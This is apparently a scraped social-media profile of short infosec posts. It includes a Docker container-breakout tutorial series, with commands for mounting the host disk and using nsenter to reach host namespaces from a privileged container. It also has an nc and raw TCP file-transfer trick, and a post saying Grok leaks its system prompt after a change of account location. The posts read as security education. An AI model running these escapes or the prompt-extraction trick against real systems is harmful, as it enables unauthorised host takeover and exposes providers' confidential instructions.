Advertisement ยท 728 ร— 90

Posts by ace

Pastebin search tips

1. Search by keywords in archive org collection search web.archive.org/collection-seaโ€ฆ (last update 2023)
2. Search fresh pastes links in index.commoncrawl.org
3. Search in Pastebin and dozens other paste sites with this Google CSE:

cybdetective.com/pastebin.html

1 year ago 1 0 0 0

Good shot, really impressive.

1 year ago 4 0 0 0
Post image

Enumeration tools for hacking.

github.com/Ignitetechno...

1 year ago 1 0 0 0
Post image Post image Post image Post image

Hmm, ChatGPT's system prompt looks a bit weird compared to Grok's ๐Ÿค”.

#infosec #ai #llm #informationdisclosure

1 year ago 1 0 0 0
Post image Post image Post image Post image

Lol, what's that? Grok happily outputs it's system prompt if you change your account location to some specific locations.
Ok...

1 year ago 0 0 0 0

Privileged containers should be avoided whenever possible. But sometimes it is necessary if you run a low level app like k8s or kubevirt.
They require privileged containers to manage the resources.

1 year ago 0 0 0 0

Example:
mount /dev/sda1 /mnt/hostfs.

If the container also runs with --pid host, you can directly switch to the host namespace which is the same as directly accessing the host.

Example:
nsenter --target 1 --mount --uts --ipc --net --pid -- bash.

1 year ago 0 0 1 0
Advertisement

๐Ÿณ #Docker #ContainerBreakout #PrivilegeEscalation
2. Escaping a privileged Container

To escape a privileged container is pretty easy because you have access to the devices under /dev, i.e. you can mount the disk inside the container and access the host filesystem.

1 year ago 1 0 1 0

This means the socket can be used to start a privileged container that ultimately gives root privileges on the host

Usually mounted docker sockets are found in corporate CI environments to run build jobs.

1 year ago 0 0 0 0

๐Ÿณ #Docker #ContainerBreakout:
1. Mounted Docker socket:

If you find a mounted Docker socket inside a container it can usually be exploited to takeover the host.

This is because docker itself does not have access control and access to the socket allows to perform any action.

1 year ago 0 0 1 0

Did you know there are currently 7 known ways to break out of a ๐Ÿณ #Docker #container?

I will explain them to you in a Docker escape series.

#PrivilegeEscalation #ContainerBreakout
#DockerBreakout

1 year ago 0 0 0 0

Yes, it also works with binary data.

But you have to make it executable again (in case of a program) after it was received.

1 year ago 1 0 0 0
Post image

๐Ÿ˜‚ Security best practice if your password appears in a word list. Make a PR to remove it and let everyone know that it's your password.

1 year ago 0 0 0 0

How to receive a file on a ๐Ÿง #Linux host where you have no curl available?

You can leverage Linux's raw TCP network socket.

Host the file on a public accessible IP with:
nc -lvp 999 < /path/file

And receive it on the client with:
cat < /dev/net/<IP>/999 > /tmp/out

1 year ago 2 0 1 0
Advertisement

You can just try to buy it on GoDaddy's website, normally it will show you that the domain is taken and an estimated price for brokerage services.

1 year ago 2 0 0 0

You can try GoDaddy. They usually offer broker services for such cases.
But depending on the domain it can become very fast very expensive.
But u can take a look if they offer it for the domain u want.
If not, your only option is to whois lookup the data and contact the registrar.

1 year ago 1 0 1 0
YouTube Share your videos with friends, family, and the world

How to find n-day vulnerabilities in Google Chrome V8 engine?
Checkout Alisa's video from VXCON www.youtube.com/live/b9Ohamk...

1 year ago 0 0 0 0

๐Ÿ˜Š only to ensure u r legit...

1 year ago 1 0 0 0
YouTube Share your videos with friends, family, and the world

Interesting video and research by Alisa Esage about Fuzzing.

www.youtube.com/live/9U-FK_Q...

Slides: zerodayengineering.com/research/sli...

1 year ago 2 1 0 0

I'm really impressed by the possibilities that bluesky provides. It lets me setup everything how I like it, even content moderation settings in a very detailed way. This is pretty cool.

1 year ago 0 0 0 0

Man, where are all the skilled Security Researchers?

1 year ago 2 0 0 0